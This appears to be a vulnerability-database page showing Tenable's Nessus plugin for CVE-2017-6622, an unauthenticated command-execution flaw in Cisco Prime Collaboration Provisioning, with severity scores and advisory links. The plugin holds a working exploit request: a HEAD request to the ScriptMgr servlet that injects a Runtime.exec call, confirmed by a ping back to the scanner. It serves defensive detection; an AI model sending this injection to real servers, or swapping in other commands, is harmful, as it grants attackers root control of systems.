Lucene search
This script is Copyright (C) 2017-2019 Tenable Network Security, Inc.CISCO_PRIME_CP_CVE-2017-6622.NASLHistoryJul 13, 2017 - 12:00 a.m.
Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE
2017-07-1300:00:00
This script is Copyright (C) 2017-2019 Tenable Network Security, Inc.
www.tenable.com
38
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
0.806
Percentile
98.4%
The remote Cisco Prime Collaboration Provisioning server is affected by a remote command execution vulnerability in the ScriptMgr servlet due to a failure to restrict the HTTP HEAD method. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.
Note that the remote Cisco Prime Collaboration Provisioning server is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(101531);
script_version("1.6");
script_cvs_date("Date: 2019/03/06 18:38:55");
script_cve_id("CVE-2017-6622");
script_bugtraq_id(98520);
script_xref(name:"CISCO-BUG-ID", value:"CSCvc98724");
script_xref(name:"CISCO-SA", value:"cisco-sa-20170517-pcp1");
script_xref(name:"ZDI", value:"ZDI-17-445");
script_name(english:"Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE");
script_summary(english:"Attempts to perform a remote command injection.");
script_set_attribute(attribute:"synopsis", value:
"The remote network management server is affected by a remote command
execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote Cisco Prime Collaboration Provisioning server is affected
by a remote command execution vulnerability in the ScriptMgr servlet
due to a failure to restrict the HTTP HEAD method. An unauthenticated,
remote attacker can exploit this to bypass authentication and execute
arbitrary commands with root privileges.
Note that the remote Cisco Prime Collaboration Provisioning server is
reportedly affected by additional vulnerabilities; however, Nessus has
not tested for these.");
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e00b5d5b");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-445/");
script_set_attribute(attribute:"solution", value:
"Upgrade to Cisco Prime Collaboration Provisioning version 12.1 or
later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/17");
script_set_attribute(attribute:"patch_publication_date", value:"2017/05/17");
script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/13");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration_provisioning");
script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CISCO");
script_copyright(english:"This script is Copyright (C) 2017-2019 Tenable Network Security, Inc.");
script_dependencies("cisco_prime_collaboration_provisioning_detect.nbin");
script_require_keys("Host/Cisco/PrimeCollaborationProvisioning/version");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
# Make sure pcp is detected
get_kb_item_or_exit("Host/Cisco/PrimeCollaborationProvisioning/version");
port = get_http_port(default:443);
# Vulnerable ScriptMgr servlet is reached through mod_jk
banner = get_http_banner(port:port);
if (banner !~ "Server:.*Apache.*mod_jk")
{
audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}
pat = SCRIPT_NAME;
if(strlen(pat) > 16)
pat = substr(pat, 0, 15);
cmd = "ping%20-c%2010%20" + "-p%20" + hexstr(pat) + "%20" + compat::this_host();
qs = 'command=compile&language=bsh&script=foo&scripttext=Runtime.getRuntime().exec("' + cmd + '");';
uri = "/cupm/ScriptMgr?" + qs;
method = "HEAD";
res = http_send_recv3(
method : method,
item : uri,
port : port,
exit_on_fail : TRUE
);
if(res[0] =~ "^HTTP/[0-9]\.[0-9] 200")
{
filter = "icmp and src " + get_host_ip() + " and dst " + compat::this_host() +
" and icmp[icmptype] = icmp-echo";
bpf = bpf_open(filter);
if(isnull(bpf)) audit(AUDIT_FN_FAIL, "bpf_open");
timeout = 5;
t = unixtime();
repeat
{
frame = bpf_next(bpf:bpf);
# ping back seen: cmd injection succeeded !
if (frame && pat >< frame)
{
vuln = TRUE;
break;
}
}until(unixtime() - t > timeout);
bpf_close(bpf);
}
if(vuln)
{
req = http_last_sent_request();
security_report_v4(
port : port,
severity : SECURITY_HOLE,
generic : TRUE,
request : make_list(req)
);
}
else
{
audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}
Related
cvelist
cvelist
CVE-2017-6622
2017-05-18 19:00:00
zdi
zdi
exploitdb
exploitdb
cve
cve
CVE-2017-6622
2017-05-18 19:29:00
packetstorm
packetstorm
saint
saint
Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability
2017-10-25 00:00:00
Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability
2017-10-25 00:00:00
Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability
2017-10-25 00:00:00
cisco
cisco
Cisco Prime Collaboration Provisioning Authentication Bypass Vulnerability
2017-05-17 16:00:00
checkpoint_advisories
checkpoint_advisories
prion
prion
Command injection
2017-05-18 19:29:00
zdt
zdt
nvd
nvd
CVE-2017-6622
2017-05-18 19:29:00
openvas
openvas
Cisco Prime Provisioning Multiple Vulnerabilities (May 2017)
2017-05-23 00:00:00
nessus
nessus
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
0.806
Percentile
98.4%
Related for CISCO_PRIME_CP_CVE-2017-6622.NASL